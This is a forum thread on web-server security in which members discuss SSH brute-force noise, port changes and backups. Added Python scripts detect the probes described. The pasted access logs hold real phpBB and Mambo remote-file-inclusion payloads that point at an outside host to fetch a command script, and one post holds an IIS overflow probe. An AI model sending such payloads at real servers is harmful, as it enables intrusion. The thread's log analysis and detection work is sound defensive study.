[Webhosting] Security

  • willawake
    Super Modulator
    • Nov 2003
    • 8457
    • Greece

    #1

    [Webhosting] Security

    One of the first things to do for webserver security is to change the SSH port. This is the port where an admin can securely log in to the webserver using a client like PuTTY and access the shell in text mode using secure telnet or SSH. Normally the port is 22; however, it is best to change this to something above 30000, otherwise there are script kiddies running software which will try to log in to your server via SSH as root on port 22. If you have appropriately chosen a good root password using a password generator then this is merely a nuisance load to your server. It can be stopped by changing the SSH port to anything above 30000.

    These are the kind of messages you would get in /var/log/messages before you change the port; after you change it, it is likely you won't see them.

    Code:
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=h-67-102-88-164.nycmny83.covad.net user=root
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=h-67-102-88-164.nycmny83.covad.net user=mailman
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=148-36-13-69.cust.propagation.net user=root
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=www.cs-schmid.de user=bin
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=p2936d3.tokynt01.ap.so-net.ne.jp user=mysql
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=lp
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=sshd
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=rpm
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=operator
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=games
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=adm
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=nobody
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=ftp
    authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=monika.itabt.htl-donaustadt.ac.at user=sync
    Last edited by willawake; 02-24-2007, 01:11 PM.
    capacitor lab yachtmati techmati
  • Topcat
    The Boss Stooge
    • Oct 2003
    • 16952
    • United States

    #2
    Re: [Webhosting] Security

    No point changing the port; any experienced intruder will find it. The key is not having soft passwords for ANYTHING accessible from the outside world.
    <--- Badcaps.net Founder

    Badcaps.net Services:

    Motherboard Repair Services

    ----------------------------------------------
    Badcaps.net Forum Members Folding Team
    http://folding.stanford.edu/
    Team : 49813
    Join in!!
    Team Stats

    • willawake
      Super Modulator
      • Nov 2003
      • 8457
      • Greece

      #3
      Re: [Webhosting] Security

      That is the whole point though. The majority of hack attempts are just kids using tools. If you like to serve multiple requests per second for SSH login then don't change it. Of course, yes, if they scan all ports of your IP then they can find it, but that is a more determined scan. The kids are just quickly looking for any IP with SSH that they can log in to via root with dictionary words. Yes, the passwords for everything should be secure and certainly not dictionary words.

      The second type of easy hack is trying a specific exploit, so they will look for an installation of an insecure version of software, whether WordPress, Mambo, phpBB etc., and they have a tool which will detect the software version and apply the hack, gaining them access to deface etc.

      This leads webmasters to think they are being personally targeted. But that is not the case; their lack of attention to updates has attracted the attention.

      Here is an example of an opportunistic hack attempt:

      Code:
      200.105.46.4 - - [03/Nov/2006:15:27:10 -0500] "SEARCH /\x90\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\x04H\
      Now that is an IIS exploit, but the thing is that I am running Apache under Linux...

      • willawake
        Super Modulator
        • Nov 2003
        • 8457
        • Greece

        #4
        Re: [Webhosting] Security

        If anyone can explain wtf this stuff is...

        Code:
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/phpBB2/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/phpBB2/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/modules/PNphpBB2/includes/functions_admin.phpfunctions_admin.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/Forums/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/forum/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/forums/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mambo/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/admin/admin_styles.php?phpbb_root_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/cms/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/cms/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mb/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mb/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/mambo/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/site/index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
        64.182.42.1 - - [28/Jan/2007:17:29:41 -0500] "GET http://207.46.232.182/site/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://80.80.120.163/CMD.gif?&cmd=wget HTTP/1.0" 404 -
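The two access-log excerpts in posts #3 and #4 show the opportunistic probes being discussed: an IIS WebDAV-style SEARCH request full of escaped bytes, and phpBB/Mambo requests whose query parameters point at a remote http:// URL. The following Python is an added example, not code from the thread, that flags both patterns in combined-format Apache access lines; the sample lines, hosts and addresses in it are constructed.

```python
"""Flag opportunistic web-exploit probes in Apache combined-format access logs.

Added example for the two log excerpts quoted in this thread: an odd method
with escaped non-printable bytes in the target (the IIS WebDAV "SEARCH" probe)
and query parameters whose value is a remote http:// URL (the phpBB/Mambo
remote-file-inclusion probes). Sample lines below are constructed with
documentation addresses, not copied from a live server."""
import re
from urllib.parse import urlsplit, parse_qsl

# client, identd, user, [timestamp], "method target [protocol]", status, size
ACCESS_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>HTTP/[\d.]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
ORDINARY_METHODS = {'GET', 'HEAD', 'POST', 'OPTIONS'}   # heuristic, tune per site
ESCAPED_BYTE_RE = re.compile(r'\\x[0-9a-fA-F]{2}')      # Apache logs raw bytes as \xNN
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_access_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = ACCESS_RE.match(line)
    return m.groupdict() if m else None


def remote_url_params(target):
    """(name, value) pairs in the query string whose value is an absolute URL.

    The target may be a bare path or a full proxy-style URL; either way only
    the part after the first '?' is treated as the query string."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL_RE.match(v)]


def classify_request(rec):
    """Indicator tags for one parsed record; an empty list means nothing odd."""
    tags = []
    if rec['method'] not in ORDINARY_METHODS:
        tags.append('unusual_method:' + rec['method'])
    if ESCAPED_BYTE_RE.search(rec['target']):
        tags.append('binary_in_target')
    for name, value in remote_url_params(rec['target']):
        # record which host the script was being told to include code from
        tags.append('remote_url_param:%s=%s' % (name, urlsplit(value).netloc))
    return tags


def scan(lines):
    """(client, status, path, tags) for every line carrying at least one indicator."""
    findings = []
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        tags = classify_request(rec)
        if tags:
            findings.append((rec['client'], int(rec['status']),
                             urlsplit(rec['target']).path, tags))
    return findings


# Constructed sample log (RFC 5737 documentation addresses).
SAMPLE_LOG = [
    # ordinary page view, should not be flagged
    r'198.51.100.5 - - [28/Jan/2007:17:29:40 -0500] "GET /index.php?page=about HTTP/1.1" 200 5120',
    # IIS WebDAV-style probe arriving at an Apache box (shape of post #3)
    r'203.0.113.9 - - [03/Nov/2006:15:27:10 -0500] "SEARCH /\x90\x04H\x04H\x04H\x04H HTTP/1.1" 404 -',
    # phpBB remote-file-inclusion probe (shape of post #4)
    r'203.0.113.44 - - [28/Jan/2007:17:29:41 -0500] "GET http://192.0.2.10/forum/admin/admin_styles.php'
    r'?phpbb_root_path=http://203.0.113.200/CMD.gif?&cmd=wget HTTP/1.0" 404 -',
    # Mambo variant with the nested query string exactly as it gets logged
    r'203.0.113.44 - - [28/Jan/2007:17:29:41 -0500] "GET http://192.0.2.10/cms/index2.php?option=com_content'
    r'&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path='
    r'http://203.0.113.200/CMD.gif?&cmd=wget HTTP/1.0" 404 -',
]

if __name__ == '__main__':
    for client, status, path, tags in scan(SAMPLE_LOG):
        print(client, status, path, ', '.join(tags))
```

A 404 on every one of these lines means the probe missed, as in the thread, but the source still belongs in a blocklist or rate limiter.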

        • willawake
          Super Modulator
          • Nov 2003
          • 8457
          • Greece

          #5
          Re: [Webhosting] Security

          Of course, if you are personally targeted by an experienced hacker because of the high profile of the site or its content, then unless you are very careful about security it is likely that you are fucked and are going to need some good backups which are stored in a location not controlled by the server. Thankfully these are otherwise rare incidents...

          • gonzo0815
            Badcaps Legend
            • Feb 2006
            • 1600

            #6
            Re: [Webhosting] Security

            Someone is obviously trying to get a console opened by this URL; probably some systems are vulnerable to this URL, but that is only a rough assumption.

            • Topcat
              The Boss Stooge
              • Oct 2003
              • 16952
              • United States

              #7
              Re: [Webhosting] Security

              Badcaps.net is fairly high profile, many attempts have been made... I have the box locked down very nicely, hell, only 5 ports are open... Running on IIS, no major issues to report... Apache on a Win2k Pro box is my favorite web server config though...

              • willawake
                Super Modulator
                • Nov 2003
                • 8457
                • Greece

                #8
                Re: [Webhosting] Security

                I think they are trying Mambo and phpBB exploits. I am running neither.

                • Topcat
                  The Boss Stooge
                  • Oct 2003
                  • 16952
                  • United States

                  #9
                  Re: [Webhosting] Security

                  Originally posted by willawake
                  I think they are trying Mambo and phpBB exploits. I am running neither.
                  phpBB by itself is an exploit... Yes, you can tell from the commands that it's phpBB... Wonders what vB ones are out there... lol

                  • willawake
                    Super Modulator
                    • Nov 2003
                    • 8457
                    • Greece

                    #10
                    Re: [Webhosting] Security

                    Yes indeed. I was reading a while back a very sorry thread of many pages where a cheap host was apologising to his customers after one of them ran an un-updated Mambo; after the exploit the entire server was fucked, and the offsite backups which the server controlled were corrupted too. He was offering a good backup from a few months back.

                    • Topcat
                      The Boss Stooge
                      • Oct 2003
                      • 16952
                      • United States

                      #11
                      Re: [Webhosting] Security

                      The key to running a good web server:

                      Think of backups like religion: worship a new backup daily. No matter how well you think you have your box secured, there's always a new exploit that hasn't been discovered yet. No OS is flawless, and if you happen to end up as some script kiddie's lab rat, you won't lose much (if anything at all).

                      • willawake
                        Super Modulator
                        • Nov 2003
                        • 8457
                        • Greece

                        #12
                        Re: [Webhosting] Security

                        Yeah, and in the beginning do a restore before you start to worship your backups.

                        • Rainbow
                          Badcaps Legend
                          • Aug 2005
                          • 1371

                          #13
                          Re: [Webhosting] Security

                          I know how to secure my SSH daemon:
                          Code:
                          Feb 18 02:53:05 router sshd[19094]: Did not receive identification string from 211.176.61.119
                          Feb 18 02:57:02 router sshd[19095]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:02 router sshd[19095]: Failed password for invalid user root from 211.176.61.119 port 43318 ssh2
                          Feb 18 02:57:06 router sshd[19097]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:07 router sshd[19097]: Failed password for invalid user root from 211.176.61.119 port 43763 ssh2
                          Feb 18 02:57:11 router sshd[19099]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:11 router sshd[19099]: Failed password for invalid user root from 211.176.61.119 port 44226 ssh2
                          Feb 18 02:57:16 router sshd[19101]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:16 router sshd[19101]: Failed password for invalid user root from 211.176.61.119 port 44674 ssh2
                          Feb 18 02:57:21 router sshd[19103]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:21 router sshd[19103]: Failed password for invalid user root from 211.176.61.119 port 45131 ssh2
                          Feb 18 02:57:26 router sshd[19105]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:26 router sshd[19105]: Failed password for invalid user root from 211.176.61.119 port 45568 ssh2
                          Feb 18 02:57:31 router sshd[19107]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:31 router sshd[19107]: Failed password for invalid user root from 211.176.61.119 port 46008 ssh2
                          Feb 18 02:57:35 router sshd[19109]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:36 router sshd[19109]: Failed password for invalid user root from 211.176.61.119 port 46463 ssh2
                          Feb 18 02:57:40 router sshd[19111]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:40 router sshd[19111]: Failed password for invalid user root from 211.176.61.119 port 46916 ssh2
                          Feb 18 02:57:45 router sshd[19113]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:45 router sshd[19113]: Failed password for invalid user root from 211.176.61.119 port 47371 ssh2
                          Feb 18 02:57:50 router sshd[19115]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:50 router sshd[19115]: Failed password for invalid user root from 211.176.61.119 port 47818 ssh2
                          Feb 18 02:57:55 router sshd[19117]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:57:55 router sshd[19117]: Failed password for invalid user root from 211.176.61.119 port 48277 ssh2
                          Feb 18 02:58:00 router sshd[19119]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:00 router sshd[19119]: Failed password for invalid user root from 211.176.61.119 port 48717 ssh2
                          Feb 18 02:58:04 router sshd[19121]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:05 router sshd[19121]: Failed password for invalid user root from 211.176.61.119 port 49174 ssh2
                          Feb 18 02:58:09 router sshd[19123]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:09 router sshd[19123]: Failed password for invalid user root from 211.176.61.119 port 49610 ssh2
                          Feb 18 02:58:14 router sshd[19125]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:14 router sshd[19125]: Failed password for invalid user root from 211.176.61.119 port 50052 ssh2
                          Feb 18 02:58:19 router sshd[19127]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:19 router sshd[19127]: Failed password for invalid user root from 211.176.61.119 port 50505 ssh2
                          Feb 18 02:58:24 router sshd[19129]: User root from 211.176.61.119 not allowed because not listed in AllowUsers
                          Feb 18 02:58:24 router sshd[19129]: Failed password for invalid user root from 211.176.61.119 port 50958 ssh2
                          Feb 18 02:58:29 router sshd[19131]: User root from 211.176.61.119 not allowed because not listed in AllowUsers

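Posts #1 and #13 quote the two forms sshd brute-force noise takes in syslog: PAM "authentication failure; ... rhost= user=" lines, and sshd's own "Failed password" / "not allowed because not listed in AllowUsers" / "Did not receive identification string" lines. As an added example (not code from the thread), this Python summarises such lines per source so that a walk through the system accounts stands out from a single admin typo; the sample lines, hostnames and addresses are constructed.

```python
"""Summarise sshd brute-force noise from syslog.

Added example covering the two line shapes quoted in this thread: the PAM
"authentication failure; ... rhost=... user=..." lines seen in
/var/log/messages and sshd's own "Failed password", "not allowed because not
listed in AllowUsers" and "Did not receive identification string" lines.
Sample lines are constructed with documentation addresses."""
import re
from collections import Counter, defaultdict

PAM_RE = re.compile(r'authentication failure;.*?\brhost=(?P<src>\S*)\s+user=(?P<user>\S+)')
FAILED_RE = re.compile(r'Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+')
ALLOW_RE = re.compile(r'User (?P<user>\S+) from (?P<src>\S+) not allowed because not listed in AllowUsers')
# The peer opened a TCP connection but closed it without ever sending its
# "SSH-2.0-..." version banner: a port scan or banner grab, not a login attempt.
NOBANNER_RE = re.compile(r'Did not receive identification string from (?P<src>\S+)')

PATTERNS = (('pam_failure', PAM_RE), ('failed_password', FAILED_RE),
            ('allowusers_reject', ALLOW_RE), ('no_banner', NOBANNER_RE))


def classify(line):
    """Return (kind, source, username) for a recognised line, else None.
    Username is '-' when the line names none (or rhost is empty)."""
    for kind, rx in PATTERNS:
        m = rx.search(line)
        if m:
            g = m.groupdict()
            return kind, g.get('src') or '-', g.get('user') or '-'
    return None


def summarise(lines, threshold=5):
    """Aggregate events per source address/host.

    A source with at least `threshold` events, or more than one distinct
    username, is marked as a brute-force candidate; one failed password
    from one user is left alone."""
    per_src = defaultdict(lambda: {'events': 0, 'users': set(), 'kinds': Counter()})
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        kind, src, user = hit
        rec = per_src[src]
        rec['events'] += 1
        rec['kinds'][kind] += 1
        if user != '-':
            rec['users'].add(user)
    return {
        src: {
            'events': r['events'],
            'users': sorted(r['users']),
            'kinds': dict(r['kinds']),
            'brute_force': r['events'] >= threshold or len(r['users']) > 1,
        }
        for src, r in per_src.items()
    }


# Constructed sample log (RFC 5737 / example.net names, not real hosts).
SAMPLE_LOG = [
    # /var/log/messages shape from post #1: one host walking the system accounts
    'Feb 24 01:02:03 web sshd(pam_unix)[4711]: authentication failure; logname= uid=0 euid=0 '
    'tty=ssh ruser= rhost=scan.example.net user=root',
    'Feb 24 01:02:05 web sshd(pam_unix)[4713]: authentication failure; logname= uid=0 euid=0 '
    'tty=ssh ruser= rhost=scan.example.net user=mysql',
    'Feb 24 01:02:08 web sshd(pam_unix)[4715]: authentication failure; logname= uid=0 euid=0 '
    'tty=ssh ruser= rhost=scan.example.net user=games',
    # sshd shape from post #13, with AllowUsers in force
    'Feb 18 02:53:05 router sshd[19094]: Did not receive identification string from 203.0.113.7',
    'Feb 18 02:57:02 router sshd[19095]: User root from 203.0.113.7 not allowed because not listed in AllowUsers',
    'Feb 18 02:57:02 router sshd[19095]: Failed password for invalid user root from 203.0.113.7 port 43318 ssh2',
    'Feb 18 02:57:06 router sshd[19097]: User root from 203.0.113.7 not allowed because not listed in AllowUsers',
    'Feb 18 02:57:07 router sshd[19097]: Failed password for invalid user root from 203.0.113.7 port 43763 ssh2',
    # a real admin mistyping a password once, then logging in with a key
    'Feb 18 08:15:00 router sshd[20001]: Failed password for alice from 198.51.100.5 port 51000 ssh2',
    'Feb 18 08:15:09 router sshd[20002]: Accepted publickey for alice from 198.51.100.5 port 51002 ssh2',
]

if __name__ == '__main__':
    for src, rec in summarise(SAMPLE_LOG).items():
        print(src, rec)
```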

                          • willawake
                            Super Modulator
                            • Nov 2003
                            • 8457
                            • Greece

                            #14
                            Re: [Webhosting] Security

                            What is the identification string? Keys?
                            Last edited by willawake; 02-24-2007, 05:25 PM.

                            • Tom41
                              Badcaps Veteran
                              • Oct 2005
                              • 336
                              • England

                              #15
                              Re: [Webhosting] Security

                              I have my web server locked down securely, I believe. The root password is unguessable (20 random characters, changed weekly) and I don't even have the telnetd, sshd or ftpd running! If I need to get something onto the web server, I have to go to the actual console and start up ftpd manually, remembering to stop it when I'm done. Or just burn the files I want to a CD-RW and put them on the server that way.

                              The only port on the server that's forwarded to the Internet is port 90 (for some reason, the ISP blocks incoming traffic to port 80 - perhaps to stop people getting into your router?).

                              Even so, I have had the server hacked twice. Without any ftpd or sshd running, and with a strong root password, I still got the web server's main page replaced with a hostile ActiveX control that would delete cmd.exe and command.com from any PC visiting (provided they were logged into an admin account). The second time was more of a script kiddie thing, a JavaScript 'prank' that caused windows to bounce around the screen until you force-terminated the browser.
                              How could it have been hacked? Exploit in Apache? Message board exploit giving you root shell access?

                              Also, I do see a lot of robots crawling my site and stopping when they see the robots.txt file. I've also seen occasional requests for things like /thisfiledoesnotexist - perhaps to see if you have a custom 404 page?
                              Last edited by Tom41; 02-24-2007, 05:40 PM.
                              You know there's something wrong when you open your PC and it has vented Rubycons...

                              • willawake
                                Super Modulator
                                • Nov 2003
                                • 8457
                                • Greece

                                #16
                                Re: [Webhosting] Security

                                Your ISP blocks port 80 cos they don't want people serving?

                                What web apps are you running on that? Something got exploited.
